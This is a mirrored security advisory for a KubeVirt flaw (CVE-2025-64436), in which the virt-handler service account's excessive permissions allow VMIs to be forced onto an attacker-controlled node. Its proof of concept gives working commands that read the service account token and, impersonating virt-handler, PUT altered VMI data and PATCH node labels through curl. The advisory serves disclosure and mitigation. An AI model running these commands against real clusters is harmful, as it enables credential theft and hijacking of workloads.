GHSA-7XGM-5PRM-V5GC

Vulnerability from github – Published: 2025-11-06 23:35 – Updated: 2025-11-27 08:49
VLAI?
Summary
KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes
Details

Summary

The permissions granted to the virt-handler service account, such as the ability to update VMI and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.

Details

Following the GitHub security advisory published on March 23 2023, a ValidatingAdmissionPolicy was introduced to impose restrictions on which sections of node resources the virt-handler service account can modify. For instance, the spec section of nodes has been made immutable, and modifications to the labels section are now limited to kubevirt.io-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

However, if a virt-handler service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, virt-handler sets a specific kubevirt.io boolean label, kubevirt.io/schedulable, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to false, thereby forcing all #acr("vmi") instances to be scheduled exclusively on the compromised node.

Another finding describes how a compromised virt-handler instance can perform operations on other nodes that are intended to be executed solely by virt-api. This significantly increases both the impact and the likelihood of the vulnerability being exploited

Additionally, by default, the virt-handler service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet's NodeRestriction feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.

PoC

By injecting incorrect data into a running VMI, for example, by altering the kubevirt.io/nodeName label to reference a different node, the VMI is marked as terminated and its state transitions to Succeeded. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker's choosing. As an example, the following demonstrates how to instantiate a basic VMI:

apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: testvm
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: testvm
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The VMI is then created on a minikube node identified with minikube-m02:

operator@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   20s   Running   10.244.1.8   minikube-m02   True

Assume that a virt-handler pod, running on node minikube-m03, is compromised and an attacker and the latter wants the testvm to be re-deployed on a controlled by them node.

First, we retrieve the virt-handler service account token in order to be able to perform requests to the Kubernetes API:

# Get the `virt-handler` pod name
attacker@minikube-m03:~$ kubectl get pods  -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler
virt-handler-kblgh               1/1     Running   0          8d
# get the `virt-handler` SA account token
attacker@minikube-m03:~$ token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) 

The attacker updates the VMI object labels in a way that makes it terminate:

# Save the current state of the VMI
attacker@minikube-m03:~$ kubectl get vmi testvm -o json > testvm.json
# replace the current `nodeName` to another one in the JSON file
attacker@minikube-m03:~$ sed -i 's/"kubevirt.io\/nodeName": "minikube-m02"/"kubevirt.io\/nodeName": "minikube-m03"/g' testvm.json 
# Perform the UPDATE request, impersonating the virt-handler
attacker@minikube-m03:~$ curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k  -X PUT -d @testvm.json -H "Content-Type: application/json" -H "Authorization: bearer $token"
# Get the current state of the VMI after the UPDATE
attacker@minikube-m03:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   42m   Running   10.244.1.8   minikube-m02   False # The VMI is not ready anymore
# Get the current state of the pod after the UPDATE
attacker@minikube-m03:~$ kubectl get pods | grep launcher
virt-launcher-testvm-z2fk4   0/3     Completed   0          44m  # the `virt-launcher` pod is completed

Now, the attacker can use the excessive permissions of the virt-handler service account to patch the minikube-m02 node in order to mark it as unschedulable for VMI workloads:

attacker@minikube-m03:~$ curl https://192.168.49.2:8443/api/v1/nodes/minikube-m03 -k -H "Authorization: Bearer $token" -H "Content-Type: application/strategic-merge-patch+json" --data '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}' -X PATCH

Note: This request could require multiple invocations as the virt-handler is continuously updating the schedulable state of the node it is running on.

Finally, an admin user decides to restart the VMI:

admin@minikube:~$ kubectl delete -f testvm.yaml
admin@minikube:~$ kubectl apply -f testvm.yaml
admin@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP            NODENAME       READY
testvm   80s   Running   10.244.0.15   minikube-m03   True

Identifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the userInfo object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes' NodeRestriction feature gate. Since Kubernetes version 1.32, the node authorization mode, enforced via the NodeRestriction admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.

An alternative approach would be to create a dedicated virt-handler service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the userInfo.username field of the AdmissionRequest object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.

Impact

This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "kubevirt.io/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64436"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-276"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-06T23:35:49Z",
    "nvd_published_at": "2025-11-07T23:15:46Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe permissions granted to the `virt-handler` service account, such as the ability to update VMI and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.\n\n### Details\n\nFollowing the [GitHub security advisory published on March 23 2023](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-cp96-jpmq-xrr2), a `ValidatingAdmissionPolicy` was introduced to impose restrictions on which sections of node resources the `virt-handler` service account can modify. For instance, the `spec` section of nodes has been made immutable, and modifications to the `labels` section are now limited to `kubevirt.io`-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.\n\n\nHowever, if a `virt-handler` service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, `virt-handler` sets a specific `kubevirt.io` boolean label, `kubevirt.io/schedulable`, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to `false`, thereby forcing all #acr(\"vmi\") instances to be scheduled exclusively on the compromised node.\n\n[Another finding](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp) describes how a compromised `virt-handler` instance can perform operations on other nodes that are intended to be executed solely by `virt-api`. This significantly increases both the impact and the likelihood of the vulnerability being exploited\n\n\nAdditionally, by default, the `virt-handler` service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet\u0027s `NodeRestriction` feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.\n\n\n\n### PoC\n\nBy injecting incorrect data into a running VMI, for example, by altering the `kubevirt.io/nodeName` label to reference a different node, the VMI is marked as terminated and its state transitions to `Succeeded`. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker\u0027s choosing. As an example, the following demonstrates how to instantiate a basic VMI:\n\n```yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachine\nmetadata:\n  name: testvm\nspec:\n  runStrategy: Always\n  template:\n    metadata:\n      labels:\n        kubevirt.io/size: small\n        kubevirt.io/domain: testvm\n    spec:\n      domain:\n        devices:\n          disks:\n            - name: containerdisk\n              disk:\n                bus: virtio\n            - name: cloudinitdisk\n              disk:\n                bus: virtio\n          interfaces:\n          - name: default\n            masquerade: {}\n        resources:\n          requests:\n            memory: 64M\n      networks:\n      - name: default\n        pod: {}\n      volumes:\n        - name: containerdisk\n          containerDisk:\n            image: quay.io/kubevirt/cirros-container-disk-demo\n        - name: cloudinitdisk\n          cloudInitNoCloud:\n            userDataBase64: SGkuXG4=\n```\n\nThe VMI is then created on a minikube node identified with `minikube-m02`:\n\n```bash\noperator@minikube:~$ kubectl get vmi testvm\nNAME     AGE   PHASE     IP           NODENAME       READY\ntestvm   20s   Running   10.244.1.8   minikube-m02   True\n```\n\nAssume that a `virt-handler` pod, running on node `minikube-m03`, is compromised and an attacker and the latter wants the `testvm` to be re-deployed on a controlled by them node.\n\nFirst, we retrieve the `virt-handler` service account token in order to be able to perform requests to the Kubernetes API:\n\n```bash\n# Get the `virt-handler` pod name\nattacker@minikube-m03:~$ kubectl get pods  -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler\nvirt-handler-kblgh               1/1     Running   0          8d\n# get the `virt-handler` SA account token\nattacker@minikube-m03:~$ token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) \n```\n\nThe attacker updates the VMI object labels in a way that makes it terminate:\n\n```bash\n# Save the current state of the VMI\nattacker@minikube-m03:~$ kubectl get vmi testvm -o json \u003e testvm.json\n# replace the current `nodeName` to another one in the JSON file\nattacker@minikube-m03:~$ sed -i \u0027s/\"kubevirt.io\\/nodeName\": \"minikube-m02\"/\"kubevirt.io\\/nodeName\": \"minikube-m03\"/g\u0027 testvm.json \n# Perform the UPDATE request, impersonating the virt-handler\nattacker@minikube-m03:~$ curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k  -X PUT -d @testvm.json -H \"Content-Type: application/json\" -H \"Authorization: bearer $token\"\n# Get the current state of the VMI after the UPDATE\nattacker@minikube-m03:~$ kubectl get vmi testvm\nNAME     AGE   PHASE     IP           NODENAME       READY\ntestvm   42m   Running   10.244.1.8   minikube-m02   False # The VMI is not ready anymore\n# Get the current state of the pod after the UPDATE\nattacker@minikube-m03:~$ kubectl get pods | grep launcher\nvirt-launcher-testvm-z2fk4   0/3     Completed   0          44m  # the `virt-launcher` pod is completed\n```\n\nNow, the attacker can use the excessive permissions of the `virt-handler` service account to patch the `minikube-m02` node in order to mark it as unschedulable for VMI workloads:\n\n```bash\nattacker@minikube-m03:~$ curl https://192.168.49.2:8443/api/v1/nodes/minikube-m03 -k -H \"Authorization: Bearer $token\" -H \"Content-Type: application/strategic-merge-patch+json\" --data \u0027{\"metadata\":{\"labels\":{\"kubevirt.io/schedulable\":\"false\"}}}\u0027 -X PATCH\n```\n\n**Note: This request could require multiple invocations as the `virt-handler` is continuously updating the schedulable state of the node it is running on**.\n\nFinally, an admin user decides to restart the VMI:\n\n```bash\nadmin@minikube:~$ kubectl delete -f testvm.yaml\nadmin@minikube:~$ kubectl apply -f testvm.yaml\nadmin@minikube:~$ kubectl get vmi testvm\nNAME     AGE   PHASE     IP            NODENAME       READY\ntestvm   80s   Running   10.244.0.15   minikube-m03   True\n```\n\nIdentifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the `userInfo` object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes\u0027 `NodeRestriction` feature gate. Since Kubernetes version 1.32, the `node` authorization mode, enforced via the `NodeRestriction` admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.\n\nAn alternative approach would be to create a dedicated `virt-handler` service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the `userInfo.username` field of the `AdmissionRequest` object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.\n\n\n### Impact\n\nThis vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.",
  "id": "GHSA-7xgm-5prm-v5gc",
  "modified": "2025-11-27T08:49:08Z",
  "published": "2025-11-06T23:35:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-7xgm-5prm-v5gc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64436"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubevirt/kubevirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…